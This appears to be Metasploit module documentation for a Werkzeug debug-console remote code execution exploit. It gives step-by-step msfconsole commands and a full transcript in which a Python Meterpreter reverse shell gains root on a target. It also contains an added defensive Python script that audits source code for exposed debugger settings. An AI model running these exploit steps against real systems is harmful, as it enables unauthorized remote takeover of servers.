Vulnerable Application
Verified against:
- 0.9.6 on Debian
- 0.9.6 on CentOS
- 0.10 on Debian
A sample application which enables the console debugger is available here
Verification Steps
- Install the application
- Start msfconsole
- Do: use exploit/multi/http/werkzeug_debug_rce
- Do: set rport <port>
- Do: set rhost <ip>
- Do: check
  [+] 10.108.106.201:8081 - The target is vulnerable.
- Do: set payload python/meterpreter/reverse_tcp
- Do: set lhost <ip>
- Do: exploit
- You should get a shell.
Options
TARGETURI
TARGETURI defaults to /console, as defined by Werkzeug; however, it can be changed within the Python script.
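Because the console path is set in the application's own Python code, a source audit can find both the exposure and the path in use. The following is an added example, not part of the module or of Werkzeug: it walks a file's AST for calls that enable the debugger and reports the configured console_path. The sample app, the myapp import and the /admin-console path are constructed for illustration, and only literal argument values are resolved.

```python
import ast

# Constructed sample: an app that turns on the interactive debugger.
SAMPLE_APP = '''
from werkzeug.debug import DebuggedApplication
from werkzeug.serving import run_simple
from myapp import app

app = DebuggedApplication(app, evalex=True, console_path="/admin-console")
run_simple("0.0.0.0", 8081, app, use_debugger=True)
'''

def _name(func):
    """Return the trailing name of a call target (foo or obj.foo)."""
    return getattr(func, "attr", None) or getattr(func, "id", None)

def _kw(call, key, default=None):
    """Return a keyword argument's literal value, or default if absent/non-literal."""
    for kw in call.keywords:
        if kw.arg == key and isinstance(kw.value, ast.Constant):
            return kw.value.value
    return default

def find_debugger_exposure(source):
    """Return sorted (line, finding) tuples for calls that enable the Werkzeug debugger."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _name(node.func)
        if name == "DebuggedApplication":
            evalex = _kw(node, "evalex", False)
            # evalex may also be passed as the second positional argument
            if len(node.args) > 1 and isinstance(node.args[1], ast.Constant):
                evalex = node.args[1].value
            if evalex:
                path = _kw(node, "console_path", "/console")
                findings.append((node.lineno, f"evalex console at {path}"))
        elif name == "run_simple" and _kw(node, "use_debugger", False):
            findings.append((node.lineno, "run_simple(use_debugger=True)"))
        elif name == "run" and _kw(node, "debug", False):
            findings.append((node.lineno, "run(debug=True)"))
    return sorted(findings)

if __name__ == "__main__":
    for line, finding in find_debugger_exposure(SAMPLE_APP):
        print(f"line {line}: {finding}")
```

Any finding in code that is deployed outside a developer workstation should be treated as a release blocker, since the debugger is meant for local development only.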
Scenarios
Example using the sample app mentioned above.
msf > use exploit/multi/http/werkzeug_debug_rce
msf exploit(werkzeug_debug_rce) > set rport 8081
rport => 8081
msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
rhost => 10.108.106.201
msf exploit(werkzeug_debug_rce) > check
[+] 10.108.106.201:8081 - The target is vulnerable.
msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
lhost => 10.108.106.121
msf exploit(werkzeug_debug_rce) > exploit
[*] Started reverse handler on 10.108.106.121:4444
[*] Sending stage (25277 bytes) to 10.108.106.201
[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
meterpreter > getpid
Current pid: 13034
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : werkzeug
OS : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
Architecture : x86_64
Meterpreter : python/python
meterpreter > shell
Process 13037 created.
Channel 0 created.
/bin/sh: 0: can't access tty; job control turned off
# ls
app.py app.pyc werkzeug
# exit
meterpreter > exit
[*] Shutting down Meterpreter...